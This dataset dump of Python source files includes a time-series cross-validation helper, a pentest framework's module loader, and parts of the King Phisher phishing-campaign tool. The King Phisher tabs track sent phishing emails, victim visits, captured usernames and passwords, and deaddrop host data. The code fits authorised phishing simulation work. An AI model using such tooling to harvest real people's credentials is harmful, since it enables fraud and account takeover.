metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "0x0L/tscv",
"score": 3
} |
#### File: 0x0L/tscv/tscv.py
```python
import numpy as np
class Sequencer(object):
def __init__(self, n, lookback=1, lookforward=1, delay=0, step=1, squeeze=True):
"""Build sequence-liked features and targets indices for timeseries
Idx / Time 0.......................................................n
1 | lookback | delay | lookforward | |
2 | step | lookback | delay | lookforward | |
...
last | step | ... | step | lookback | delay | lookforward |
Parameters
----------
n : int
Length of the timeseries.
lookback : int (default is 1)
Features are sequences built up taking `lookback` values in the past.
lookforward : int (default is 1)
Targets are sequences built up taking `lookforward` values in the
future.
delay : int (default is 0)
Additional delay between features and targets.
delay can be negative but must be greater than -lookback.
step : int (default is 1)
Stepping size between samples. Must be strictly positive.
squeeze : boolean (default is True)
If true, squeezes single timestep features and targets.
Only has an effect if `lookback` or `lookforward` is equal to 1.
Usage
-----
>>> X = np.random.randn(2500, 1000, 3)
>>> y = X[:, :, 0]
>>> seq = Sequencer(len(y), lookback=5, lookforward=1)
>>> cv = seq.split(train_size=250, test_size=21)
>>> for train_test_split in cv:
X_train, X_test = seq.features(train_test_split, X)
y_train, y_test = seq.targets(train_test_split, y)
indices_train, indices_test = seq.indices(train_test_split)
"""
squeeze_ = np.squeeze if squeeze else lambda x: x
indices, features, targets = [], [], []
for i in range(lookback, n + 1 - delay - lookforward, step):
indices.append(i)
features.append(squeeze_(
np.arange(i - lookback, i)))
targets.append(squeeze_(
np.arange(i + delay, i + delay + lookforward)))
self.indices_ = np.array(indices)
self.features_, self.targets_ = np.array(features), np.array(targets)
def split(self, train_size, test_size):
"""Vanilla rolling-window cross validation generator
Parameters
----------
train_size : int
Size of the training set.
test_size : int
Size of the testing set.
"""
n = len(self.indices_)
for i in range(train_size, n, test_size):
train, test = np.arange(i - train_size, i), np.arange(i, min(i + test_size, n))
yield train, test
def features(self, split, features):
"""Return features slice for a test/train split."""
train, test = split
return features[self.features_[train]], features[self.features_[test]]
def targets(self, split, targets):
"""Return targets slice for a test/train split."""
train, test = split
return targets[self.targets_[train]], targets[self.targets_[test]]
def indices(self, split):
"""Return indices slice for a test/train split."""
train, test = split
return self.indices_[train], self.indices_[test]
``` |
{
"source": "0x0mar/Harness",
"score": 2
} |
#### File: harness/core/base.py
```python
import sys
import os
import json
import glob
from threading import Thread
from harness.core import framework
from harness.core import threads
from collections import OrderedDict
class Harness(framework.Framework):
def __init__(self):
framework.Framework.__init__(self)
self.intro = " __ __\n"
self.intro += " / / / /___ __________ ___ __________\n"
self.intro += " / /_/ / __ `/ ___/ __ \/ _ \/ ___/ ___/\n"
self.intro += " / __ / /_/ / / / / / / __(__ |__ )\n"
self.intro += "/_/ /_/\__,_/_/ /_/ /_/\___/____/____/\n"
self.intro += '\n\n\tProject Harness \n\tAuthor:\t<NAME>\n\tContact: rk5devmail[A T]gmail, @rgkelley5\n'
self.intro += '\nType help or ? to list commands. \n'
self.prompt = 'H> '
self.load_modules()
def load_modules(self):
self.print_debug("Loading modules....")
_module_names = []
for root, dirs, files in os.walk(self.main_mod_dir):
for _dir in dirs:
if not _dir.startswith("__"):
sys.path.append(os.path.realpath(os.path.join(root, _dir)))
for _file in files:
if _file.endswith(".py") and not _file.startswith("__"):
_module_names.append(_file.split(".")[0])
_modules = list(map(__import__, _module_names))
for mod in _modules:
mod_path = mod.__file__.split("modules")
if len(mod_path) > 1:
_mod_name = mod_path[1][1:].split(".")[0] # Get the module name --> path/module
self.modules[_mod_name] = mod
self.add_completion('load', _mod_name)
self.modules = OrderedDict(sorted(self.modules.items(), key=lambda t:t[0]))
def do_load(self, args=None):
# args = module name for now
name = args
if name in self.modules:
mod = self.modules[name].Module()
result, _globals = mod.go(self.framework_globals)
self.framework_globals = _globals
if type(result) is threads.ModuleThread:
self.print_debug("Starting background job...")
self._add_job(name, result)
result.start()
else:
self.print_error("Unknown module specified")
def show_options(self, args=None):
super().show_globals()
print()
super().show_options()
``` |
{
"source": "0x0mar/king-phisher",
"score": 2
} |
#### File: client/dialogs/campaign_selection.py
```python
from king_phisher import utilities
from king_phisher.client import gui_utilities
from gi.repository import Gdk
from gi.repository import Gtk
__all__ = ['KingPhisherClientCampaignSelectionDialog']
class KingPhisherClientCampaignSelectionDialog(gui_utilities.UtilityGladeGObject):
"""
Display a dialog which allows a new campaign to be created or an
existing campaign to be opened.
"""
gobject_ids = [
'button_new_campaign',
'entry_new_campaign_name',
'treeview_campaigns'
]
top_gobject = 'dialog'
def __init__(self, *args, **kwargs):
super(KingPhisherClientCampaignSelectionDialog, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaigns']
columns = ['Campaign Name', 'Created By', 'Creation Date']
for column_id in range(len(columns)):
column_name = columns[column_id]
column_id += 1
column = Gtk.TreeViewColumn(column_name, Gtk.CellRendererText(), text=column_id)
column.set_sort_column_id(column_id)
treeview.append_column(column)
treeview.get_selection().set_mode(Gtk.SelectionMode.SINGLE)
self.load_campaigns()
def _highlight_campaign(self, campaign_name):
treeview = self.gobjects['treeview_campaigns']
store = treeview.get_model()
store_iter = store.get_iter_first()
while store_iter:
if store.get_value(store_iter, 1) == campaign_name:
treeview.set_cursor(store.get_path(store_iter), None, False)
return True
store_iter = store.iter_next(store_iter)
return False
def load_campaigns(self):
"""Load campaigns from the remote server and populate the :py:class:`Gtk.TreeView`."""
treeview = self.gobjects['treeview_campaigns']
store = treeview.get_model()
if store == None:
store = Gtk.ListStore(str, str, str, str)
treeview.set_model(store)
else:
store.clear()
for campaign in self.parent.rpc.remote_table('campaigns'):
created_ts = campaign['created']
created_ts = utilities.datetime_utc_to_local(created_ts)
created_ts = utilities.format_datetime(created_ts)
store.append([str(campaign['id']), campaign['name'], campaign['user_id'], created_ts])
def signal_button_clicked(self, button):
campaign_name_entry = self.gobjects['entry_new_campaign_name']
campaign_name = campaign_name_entry.get_property('text')
if not campaign_name:
gui_utilities.show_dialog_warning('Invalid Campaign Name', self.dialog, 'Please specify a new campaign name')
return
try:
self.parent.rpc('campaign/new', campaign_name)
except:
gui_utilities.show_dialog_error('Failed To Create New Campaign', self.dialog, 'Encountered an error creating the new campaign')
return
campaign_name_entry.set_property('text', '')
self.load_campaigns()
self._highlight_campaign(campaign_name)
def signal_entry_new_campaign_name_activate(self, entry):
self.gobjects['button_new_campaign'].emit('clicked')
def signal_treeview_key_pressed(self, widget, event):
if event.type != Gdk.EventType.KEY_PRESS:
return
treeview = self.gobjects['treeview_campaigns']
keyval = event.get_keyval()[1]
if event.get_state() == Gdk.ModifierType.CONTROL_MASK:
if keyval == Gdk.KEY_c:
gui_utilities.gtk_treeview_selection_to_clipboard(treeview)
elif keyval == Gdk.KEY_F5:
self.load_campaigns()
self._highlight_campaign(self.config.get('campaign_name'))
elif keyval == Gdk.KEY_Delete:
treeview_selection = treeview.get_selection()
(model, tree_iter) = treeview_selection.get_selected()
if not tree_iter:
return
campaign_id = model.get_value(tree_iter, 0)
if self.config.get('campaign_id') == campaign_id:
gui_utilities.show_dialog_warning('Can Not Delete Campaign', self.dialog, 'Can not delete the current campaign.')
return
if not gui_utilities.show_dialog_yes_no('Delete This Campaign?', self.dialog, 'This action is irreversible, all campaign data will be lost.'):
return
self.parent.rpc('campaign/delete', campaign_id)
self.load_campaigns()
self._highlight_campaign(self.config.get('campaign_name'))
def interact(self):
self._highlight_campaign(self.config.get('campaign_name'))
self.dialog.show_all()
response = self.dialog.run()
old_campaign_id = self.config.get('campaign_id')
old_campaign_name = self.config.get('campaign_name')
while response != Gtk.ResponseType.CANCEL:
treeview = self.gobjects['treeview_campaigns']
selection = treeview.get_selection()
(model, tree_iter) = selection.get_selected()
if tree_iter:
break
gui_utilities.show_dialog_error('No Campaign Selected', self.dialog, 'Either select a campaign or create a new one.')
response = self.dialog.run()
if response != Gtk.ResponseType.CANCEL:
campaign_id = model.get_value(tree_iter, 0)
self.config['campaign_id'] = campaign_id
campaign_name = model.get_value(tree_iter, 1)
self.config['campaign_name'] = campaign_name
if not (campaign_id == old_campaign_id and campaign_name == old_campaign_name):
self.parent.emit('campaign-set', campaign_id)
self.dialog.destroy()
return response
```
#### File: client/tabs/campaign.py
```python
import datetime
import logging
import threading
import time
from king_phisher import utilities
from king_phisher.client import export
from king_phisher.client import graphs
from king_phisher.client import gui_utilities
from gi.repository import Gdk
from gi.repository import GLib
from gi.repository import Gtk
class CampaignViewGenericTab(gui_utilities.UtilityGladeGObject):
"""
This object is meant to be subclassed by all of the tabs which load and
display information about the current campaign.
"""
label_text = 'Unknown'
"""The label of the tab for display in the GUI."""
top_gobject = 'box'
def __init__(self, *args, **kwargs):
self.label = Gtk.Label(label=self.label_text)
"""The :py:class:`Gtk.Label` representing this tab with text from :py:attr:`~.CampaignViewGenericTab.label_text`."""
super(CampaignViewGenericTab, self).__init__(*args, **kwargs)
self.is_destroyed = threading.Event()
getattr(self, self.top_gobject).connect('destroy', self.signal_destroy)
self.last_load_time = float('-inf')
"""The last time the data was loaded from the server."""
self.refresh_frequency = utilities.timedef_to_seconds(str(self.config.get('gui.refresh_frequency', '5m')))
"""The lifetime in seconds to wait before refreshing the data from the server."""
self.loader_thread = None
"""The thread object which loads the data from the server."""
self.loader_thread_lock = threading.Lock()
"""The :py:class:`threading.Lock` object used for synchronization between the loader and main threads."""
def load_campaign_information(self, force=False):
raise NotImplementedError()
def signal_button_clicked_refresh(self, button):
self.load_campaign_information(force=True)
def signal_destroy(self, gobject):
self.is_destroyed.set()
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
self.logger.debug("waiting on thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
self.logger.debug("joined thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
class CampaignViewGenericTableTab(CampaignViewGenericTab):
"""
This object is meant to be subclassed by tabs which will display
campaign information of different types from specific database
tables. The data in this object is refreshed when multiple events
occur and it uses an internal timer to represent the last time the
data was refreshed.
"""
gobject_ids = [
'button_refresh',
'treeview_campaign'
]
remote_table_name = ''
"""The database table represented by this tab."""
view_columns = {}
"""The dictionary map of column numbers to column names starting at column 1."""
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTableTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
treeview.get_selection().set_mode(Gtk.SelectionMode.MULTIPLE)
popup_copy_submenu = Gtk.Menu.new()
self.view_column_renderers = {}
columns = self.view_columns
for column_id in range(1, len(columns) + 1):
column_name = columns[column_id]
column = Gtk.TreeViewColumn(column_name, Gtk.CellRendererText(), text=column_id)
column.set_sort_column_id(column_id)
treeview.append_column(column)
self.view_column_renderers[column_id] = column
menu_item = Gtk.MenuItem.new_with_label(column_name)
menu_item.connect('activate', self.signal_activate_popup_menu_copy, column_id)
popup_copy_submenu.append(menu_item)
self.popup_menu = Gtk.Menu.new()
"""The :py:class:`Gtk.Menu` object which is displayed when right-clicking in the view area."""
menu_item = Gtk.MenuItem.new_with_label('Copy')
menu_item.set_submenu(popup_copy_submenu)
self.popup_menu.append(menu_item)
menu_item = Gtk.SeparatorMenuItem()
self.popup_menu.append(menu_item)
menu_item = Gtk.MenuItem.new_with_label('Delete')
menu_item.connect('activate', lambda _: self._prompt_to_delete_row())
self.popup_menu.append(menu_item)
self.popup_menu.show_all()
def _prompt_to_delete_row(self):
selection = self.gobjects['treeview_campaign'].get_selection()
if not selection.count_selected_rows():
return
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
gui_utilities.show_dialog_warning('Can Not Delete Rows While Loading', self.parent)
return
(model, tree_paths) = selection.get_selected_rows()
if not tree_paths:
return
tree_iters = map(model.get_iter, tree_paths)
row_ids = map(lambda ti: model.get_value(ti, 0), tree_iters)
if len(row_ids) == 1:
message = 'Delete This Row?'
else:
message = "Delete These {0:,} Rows?".format(len(row_ids))
if not gui_utilities.show_dialog_yes_no(message, self.parent, 'This information will be lost.'):
return
for row_id in row_ids:
self.parent.rpc(self.remote_table_name + '/delete', row_id)
self.load_campaign_information(force=True)
def format_row_data(self, row):
"""
This method is overridden by subclasses to format the raw row
data returned from the server. The length of the list must equal
the number of columns in the table. This method is called for
each row in the remote table by the loader thread.
:return: The formated row data.
:rtype: list
"""
raise NotImplementedError()
def format_cell_data(self, cell_data):
"""
This method provides formatting to the individual cell values returned
from the :py:meth:`.format_row_data` function. Values are converted into
a format suitable for reading.
:param cell: The value to format.
:return: The formatted cell value.
:rtype: str
"""
if isinstance(cell_data, datetime.datetime):
cell_data = utilities.datetime_utc_to_local(cell_data)
return utilities.format_datetime(cell_data)
elif cell_data == None:
return ''
return str(cell_data)
def load_campaign_information(self, force=False):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the
:py:attr:`~.CampaignViewGenericTab.last_load_time` is compared
with the :py:attr:`~.CampaignViewGenericTab.refresh_frequency` to
check if the information is stale. If the local data is not stale,
this function will return without updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
return
self.loader_thread_lock.acquire()
treeview = self.gobjects['treeview_campaign']
store = treeview.get_model()
if store == None:
store_columns = [str]
map(lambda x: store_columns.append(str), range(len(self.view_columns)))
store = Gtk.ListStore(*store_columns)
treeview.set_model(store)
else:
store.clear()
self.loader_thread = threading.Thread(target=self.loader_thread_routine, args=(store,))
self.loader_thread.daemon = True
self.loader_thread.start()
self.loader_thread_lock.release()
return
def loader_thread_routine(self, store):
"""
The loading routine to be executed within a thread.
:param store: The store object to place the new data.
:type store: :py:class:`Gtk.ListStore`
"""
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', False))
for row_data in self.parent.rpc.remote_table('campaign/' + self.remote_table_name, self.config['campaign_id']):
if self.is_destroyed.is_set():
break
row_id = row_data['id']
row_data = self.format_row_data(row_data)
if row_data == None:
self.parent.rpc(self.remote_table_name + '/delete', row_id)
continue
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(row_id))
gui_utilities.glib_idle_add_wait(store.append, row_data)
if self.is_destroyed.is_set():
return
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', True))
self.last_load_time = time.time()
def signal_button_clicked_export(self, button):
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent)
return
dialog = gui_utilities.UtilityFileChooser('Export Data', self.parent)
file_name = self.config['campaign_name'] + '.csv'
response = dialog.run_quick_save(file_name)
dialog.destroy()
if not response:
return
destination_file = response['target_path']
export.treeview_liststore_to_csv(self.gobjects['treeview_campaign'], destination_file)
def signal_treeview_button_pressed(self, widget, event):
if not (event.type == Gdk.EventType.BUTTON_PRESS and event.button == 3):
return
selection = self.gobjects['treeview_campaign'].get_selection()
if not selection.count_selected_rows():
return
pos_func = lambda m, d: (event.get_root_coords()[0], event.get_root_coords()[1], True)
self.popup_menu.popup(None, None, pos_func, None, event.button, event.time)
return True
def signal_treeview_key_pressed(self, widget, event):
if event.type != Gdk.EventType.KEY_PRESS:
return
treeview = self.gobjects['treeview_campaign']
keyval = event.get_keyval()[1]
if event.get_state() == Gdk.ModifierType.CONTROL_MASK:
if keyval == Gdk.KEY_c:
gui_utilities.gtk_treeview_selection_to_clipboard(treeview)
elif keyval == Gdk.KEY_F5:
self.load_campaign_information(force=True)
elif keyval == Gdk.KEY_Delete:
self._prompt_to_delete_row()
def signal_activate_popup_menu_copy(self, widget, column_id):
treeview = self.gobjects['treeview_campaign']
gui_utilities.gtk_treeview_selection_to_clipboard(treeview, column_id)
class CampaignViewDeaddropTab(CampaignViewGenericTableTab):
"""Display campaign information regarding dead drop connections."""
remote_table_name = 'deaddrop_connections'
label_text = 'Deaddrop'
view_columns = {
1: 'Destination',
2: 'Visit Count',
3: 'External IP',
4: 'Username',
5: 'Hostname',
6: 'Local IP Addresses',
7: 'First Hit',
8: 'Last Hit'
}
def format_row_data(self, connection):
deploy_id = connection['deployment_id']
deploy_details = self.parent.rpc.remote_table_row('deaddrop_deployments', deploy_id, cache=True)
if not deploy_details:
return None
row = (
deploy_details['destination'],
connection['visit_count'],
connection['visitor_ip'],
connection['local_username'],
connection['local_hostname'],
connection['local_ip_addresses'],
connection['first_visit'],
connection['last_visit']
)
return row
class CampaignViewCredentialsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding submitted credentials."""
remote_table_name = 'credentials'
label_text = 'Credentials'
view_columns = {
1: 'Email',
2: 'Username',
3: 'Password',
4: 'Submitted'
}
def __init__(self, *args, **kwargs):
super(CampaignViewCredentialsTab, self).__init__(*args, **kwargs)
self.view_column_renderers[3].set_property('visible', False)
def format_row_data(self, credential):
msg_id = credential['message_id']
msg_details = self.parent.rpc.remote_table_row('messages', msg_id, cache=True)
if not msg_details:
return None
row = (
msg_details['target_email'],
credential['username'],
credential['password'],
credential['submitted']
)
return row
def signal_button_toggled_show_passwords(self, button):
self.view_column_renderers[3].set_property('visible', button.get_property('active'))
class CampaignViewDashboardTab(CampaignViewGenericTab):
"""Display campaign information on a graphical dash board."""
gobject_ids = [
'box_top_left',
'box_top_right',
'box_bottom',
'scrolledwindow_top_left',
'scrolledwindow_top_right',
'scrolledwindow_bottom'
]
label_text = 'Dashboard'
"""The tabs label for display in the GUI."""
def __init__(self, *args, **kwargs):
super(CampaignViewDashboardTab, self).__init__(*args, **kwargs)
self.graphs = []
"""The :py:class:`.CampaignGraph` classes represented on the dash board."""
# Position: (DefaultGraphName, Size)
dash_ports = {
'top_left': (380, 200),
'top_right': (380, 200),
'bottom': None
}
for dash_port, details in dash_ports.items():
graph_name = self.config['dashboard.' + dash_port]
Klass = graphs.get_graph(graph_name)
if not Klass:
self.logger.warning('could not get graph: ' + graph_name)
continue
graph_inst = Klass(self.config, self.parent, details)
self.gobjects['scrolledwindow_' + dash_port].add_with_viewport(graph_inst.canvas)
self.gobjects['box_' + dash_port].pack_end(graph_inst.navigation_toolbar, False, False, 0)
self.graphs.append(graph_inst)
self.logger.debug("dashboard refresh frequency set to {0} seconds".format(self.refresh_frequency))
GLib.timeout_add_seconds(self.refresh_frequency, self.loader_idle_routine)
def load_campaign_information(self, force=False):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the
:py:attr:`~.CampaignViewDashboardTab.last_load_time` is compared
with the :py:attr:`~.CampaignViewDashboardTab.refresh_frequency` to
check if the information is stale. If the local data is not
stale, this function will return without updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
if not hasattr(self.parent, 'rpc'):
self.logger.warning('skipping load_campaign_information because rpc is not initialized')
return
with self.loader_thread_lock:
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
return
self.loader_thread = threading.Thread(target=self.loader_thread_routine)
self.loader_thread.daemon = True
self.loader_thread.start()
def loader_idle_routine(self):
"""The routine which refreshes the campaign data at a regular interval."""
self.logger.debug('idle loader routine called')
self.load_campaign_information(force=True)
return True
def loader_thread_routine(self):
"""The loading routine to be executed within a thread."""
info_cache = {}
for graph in self.graphs:
if self.is_destroyed.is_set():
break
info_cache = gui_utilities.glib_idle_add_wait(lambda: graph.refresh(info_cache, self.is_destroyed))
self.last_load_time = time.time()
class CampaignViewVisitsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding incoming visitors."""
remote_table_name = 'visits'
label_text = 'Visits'
view_columns = {
1: 'Email',
2: 'Visitor IP',
3: 'Visitor Details',
4: 'Visit Count',
5: 'First Visit',
6: 'Last Visit'
}
def format_row_data(self, visit):
msg_id = visit['message_id']
msg_details = self.parent.rpc.remote_table_row('messages', msg_id, cache=True)
if not msg_details:
return None
row = (
msg_details['target_email'],
visit['visitor_ip'],
visit['visitor_details'],
visit['visit_count'],
visit['first_visit'],
visit['last_visit']
)
return row
class CampaignViewMessagesTab(CampaignViewGenericTableTab):
"""Display campaign information regarding sent messages."""
remote_table_name = 'messages'
label_text = 'Messages'
view_columns = {
1: 'Email',
2: 'Sent',
3: 'Opened',
4: 'Trained'
}
def format_row_data(self, message):
row = (
message['target_email'],
message['sent'],
message['opened'],
('Yes' if message['trained'] else '')
)
return row
class CampaignViewTab(object):
"""
The King Phisher client top-level 'View Campaign' tab. This object
manages the sub-tabs which display all the information regarding
the current campaign.
"""
def __init__(self, config, parent):
"""
:param dict config: The King Phisher client configuration.
:param parent: The parent window for this object.
:type parent: :py:class:`Gtk.Window`
"""
self.config = config
self.parent = parent
self.logger = logging.getLogger('KingPhisher.Client.' + self.__class__.__name__)
self.box = Gtk.Box()
self.box.set_property('orientation', Gtk.Orientation.VERTICAL)
self.box.show()
self.label = Gtk.Label(label='View Campaign')
"""The :py:class:`Gtk.Label` representing this tabs name."""
self.notebook = Gtk.Notebook()
""" The :py:class:`Gtk.Notebook` for holding sub-tabs."""
self.notebook.connect('switch-page', self.signal_notebook_switch_page)
self.notebook.set_scrollable(True)
self.box.pack_start(self.notebook, True, True, 0)
self.tabs = {}
"""A dict object holding the sub tabs managed by this object."""
current_page = self.notebook.get_current_page()
self.last_page_id = current_page
if graphs.has_matplotlib:
self.logger.info('matplotlib is installed, dashboard will be available')
dashboard_tab = CampaignViewDashboardTab(self.config, self.parent)
self.tabs['dashboard'] = dashboard_tab
self.notebook.append_page(dashboard_tab.box, dashboard_tab.label)
else:
self.logger.warning('matplotlib is not installed, dashboard will not be available')
messages_tab = CampaignViewMessagesTab(self.config, self.parent)
self.tabs['messages'] = messages_tab
self.notebook.append_page(messages_tab.box, messages_tab.label)
visits_tab = CampaignViewVisitsTab(self.config, self.parent)
self.tabs['visits'] = visits_tab
self.notebook.append_page(visits_tab.box, visits_tab.label)
credentials_tab = CampaignViewCredentialsTab(self.config, self.parent)
self.tabs['credentials'] = credentials_tab
self.notebook.append_page(credentials_tab.box, credentials_tab.label)
deaddrop_connections_tab = CampaignViewDeaddropTab(self.config, self.parent)
self.tabs['deaddrop_connections'] = deaddrop_connections_tab
self.notebook.append_page(deaddrop_connections_tab.box, deaddrop_connections_tab.label)
for tab in self.tabs.values():
tab.box.show()
self.notebook.show()
self.parent.connect('campaign-set', self.signal_kpc_campaign_set)
def signal_kpc_campaign_set(self, kpc, cid):
for tab_name, tab in self.tabs.items():
if hasattr(tab, 'load_campaign_information'):
tab.load_campaign_information(force=True)
def signal_notebook_switch_page(self, notebook, current_page, index):
if not hasattr(self.parent, 'rpc'):
return
#previous_page = notebook.get_nth_page(self.last_page_id)
self.last_page_id = index
for tab_name, tab in self.tabs.items():
if current_page != tab.box:
continue
if hasattr(tab, 'load_campaign_information'):
tab.load_campaign_information()
```
#### File: king_phisher/server/authenticator.py
```python
import hashlib
import json
import os
import random
import string
import time
from king_phisher.third_party import pam
__all__ = ['ForkedAuthenticator']
make_salt = lambda: ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for x in range(random.randint(5, 8)))
make_hash = lambda pw: hashlib.sha512(pw.encode('utf-8')).digest()
class ForkedAuthenticator(object):
"""
This provides authentication services to the King Phisher server
through PAM. It is initialized while the server is running as root
and forks into the background before the privileges are dropped. It
continues to run as root and forwards requests through a pipe to PAM.
The pipes use JSON to encoded the request data as a string before
sending it and using a newline character as the terminator.
"""
def __init__(self, cache_timeout=600):
"""
:param int cache_timeout: The life time of cached credentials in seconds.
"""
self.cache_timeout = cache_timeout
"""The timeout of the credential cache in seconds."""
self.parent_rfile, self.child_wfile = os.pipe()
self.child_rfile, self.parent_wfile = os.pipe()
self.child_pid = os.fork()
"""The PID of the forked child."""
if not self.child_pid:
self.rfile = self.child_rfile
self.wfile = self.child_wfile
else:
self.rfile = self.parent_rfile
self.wfile = self.parent_wfile
self.rfile = os.fdopen(self.rfile, 'r', 1)
self.wfile = os.fdopen(self.wfile, 'w', 1)
if not self.child_pid:
self.child_routine()
self.rfile.close()
self.wfile.close()
os._exit(os.EX_OK)
self.cache_salt = make_salt()
"""The salt to be prepended to passwords before hashing them for the cache."""
self.cache = {}
"""The credential cache dictionary. Keys are usernames and values are tuples of password hashes and ages."""
return
def send(self, request):
"""
Encode and send a request through the pipe to the opposite end.
:param dict request: A request.
"""
self.wfile.write(json.dumps(request) + '\n')
def recv(self):
"""
Receive a request and decode it.
:return: The decoded request.
:rtype: dict
"""
try:
request = self.rfile.readline()[:-1]
return json.loads(request)
except KeyboardInterrupt:
return {}
def child_routine(self):
"""
The main routine that is executed by the child after the object
forks. This loop does not exit unless a stop request is made.
"""
service = 'login'
if os.path.isfile('/etc/pam.d/sshd'):
service = 'sshd'
while True:
request = self.recv()
if not 'action' in request:
continue
action = request['action']
if action == 'stop':
break
elif action != 'authenticate':
continue
username = str(request['username'])
password = str(request['password'])
result = {}
result['result'] = pam.authenticate(username, password, service=service)
self.send(result)
def authenticate(self, username, password):
"""
Check if a uername and password are valid. If they are, the
password will be salted, hashed with SHA-512 and stored so the
next call with the same values will not require sending a
request to the forked child.
:param str username: The username to check.
:param str password: The password to check.
:return: Whether the credentials are valid or not.
:rtype: bool
"""
pw_hash = make_hash(self.cache_salt + password)
cached_hash, timeout = self.cache.get(username, (None, 0))
if timeout < time.time():
request = {}
request['action'] = 'authenticate'
request['username'] = username
request['password'] = password
self.send(request)
result = self.recv()
if result['result']:
self.cache[username] = (pw_hash, time.time() + self.cache_timeout)
return result['result']
return (cached_hash == pw_hash)
def stop(self):
"""
Send a stop request to the child process and wait for it to exit.
"""
if not os.path.exists("/proc/{0}".format(self.child_pid)):
return
request = {}
request['action'] = 'stop'
self.send(request)
os.waitpid(self.child_pid, 0)
self.rfile.close()
self.wfile.close()
```
#### File: tests/server/database.py
```python
import unittest
from king_phisher import testing
from king_phisher.server.database import manager as db_manager
from king_phisher.server.database import models as db_models
from king_phisher.utilities import random_string
get_tables_with_column_id = db_models.get_tables_with_column_id
class ServerDatabaseTests(testing.KingPhisherTestCase):
def test_create_database(self):
try:
db_manager.init_database('sqlite://')
except Exception as error:
self.fail("failed to initialize the database (error: {0})".format(error.__class__.__name__))
def test_get_meta_data(self):
try:
db_manager.init_database('sqlite://')
except Exception as error:
self.fail("failed to initialize the database (error: {0})".format(error.__class__.__name__))
database_driver = db_manager.get_meta_data('database_driver')
self.assertEqual(database_driver, 'sqlite')
schema_version = db_manager.get_meta_data('schema_version')
self.assertEqual(schema_version, db_models.SCHEMA_VERSION)
def test_get_tables_id(self):
tables = set([
'alert_subscriptions',
'campaigns',
'credentials',
'deaddrop_connections',
'deaddrop_deployments',
'landing_pages',
'messages',
'meta_data',
'users',
'visits'
])
tables_with_id = get_tables_with_column_id('id')
self.assertSetEqual(set(get_tables_with_column_id('id')), tables)
def test_get_tables_campaign_id(self):
tables = set([
'alert_subscriptions',
'credentials',
'deaddrop_connections',
'deaddrop_deployments',
'landing_pages',
'messages',
'visits'
])
self.assertSetEqual(set(get_tables_with_column_id('campaign_id')), tables)
def test_get_tables_message_id(self):
tables = set([
'credentials',
'visits'
])
self.assertSetEqual(set(get_tables_with_column_id('message_id')), tables)
def test_set_meta_data(self):
try:
db_manager.init_database('sqlite://')
except Exception as error:
self.fail("failed to initialize the database (error: {0})".format(error.__class__.__name__))
# set a new value
key = random_string(10)
value = random_string(20)
db_manager.set_meta_data(key, value)
self.assertEqual(db_manager.get_meta_data(key), value)
# update an existing value
value = random_string(30)
db_manager.set_meta_data(key, value)
self.assertEqual(db_manager.get_meta_data(key), value)
if __name__ == '__main__':
unittest.main()
```
#### File: king-phisher/tools/database_console.py
```python
import argparse
import code
import logging
import os
import sys
sys.path.insert(1, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from king_phisher import version
from king_phisher.server.database import manager
from king_phisher.server.database import models
import yaml
try:
import readline
except ImportError:
pass
else:
import rlcompleter
readline.parse_and_bind('tab: complete')
def main():
parser = argparse.ArgumentParser(description='King Phisher Interactive Database Console', conflict_handler='resolve')
parser.add_argument('-v', '--version', action='version', version=parser.prog + ' Version: ' + version.version)
parser.add_argument('-L', '--log', dest='loglvl', action='store', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'], default='CRITICAL', help='set the logging level')
config_group = parser.add_mutually_exclusive_group(required=True)
config_group.add_argument('-c', '--config', dest='server_config', type=argparse.FileType('r'), help='the server configuration file')
config_group.add_argument('-u', '--url', dest='database_url', help='the database connection url')
arguments = parser.parse_args()
logging.getLogger('').setLevel(logging.DEBUG)
console_log_handler = logging.StreamHandler()
console_log_handler.setLevel(getattr(logging, arguments.loglvl))
console_log_handler.setFormatter(logging.Formatter("%(levelname)-8s %(message)s"))
logging.getLogger('').addHandler(console_log_handler)
if arguments.database_url:
database_connection_url = arguments.database_url
elif arguments.server_config:
server_config = yaml.load(arguments.server_config)
database_connection_url = server_config['server']['database']
else:
raise RuntimeError('no database connection was specified')
engine = manager.init_database(database_connection_url)
session = manager.Session()
console = code.InteractiveConsole(dict(engine=engine, manager=manager, models=models, session=session))
console.interact('starting interactive database console')
if __name__ == '__main__':
sys.exit(main())
``` |
{
"source": "0x0mar/memex-explorer",
"score": 2
} |
#### File: 0x0mar/memex-explorer/conftest.py
```python
import pytest
def pytest_addoption(parser):
"""Add `--runslow` option to py.test."""
parser.addoption("--runslow", action="store_true",
help="run slow tests")
def pytest_runtest_setup(item):
"""pytest items marked `slow` should not run by default."""
if 'slow' in item.keywords and not item.config.getoption("--runslow"):
pytest.skip("need --runslow option to run")
```
#### File: crawl_space/tests/test_crawl.py
```python
from __future__ import unicode_literals
import os
import shutil
# Test
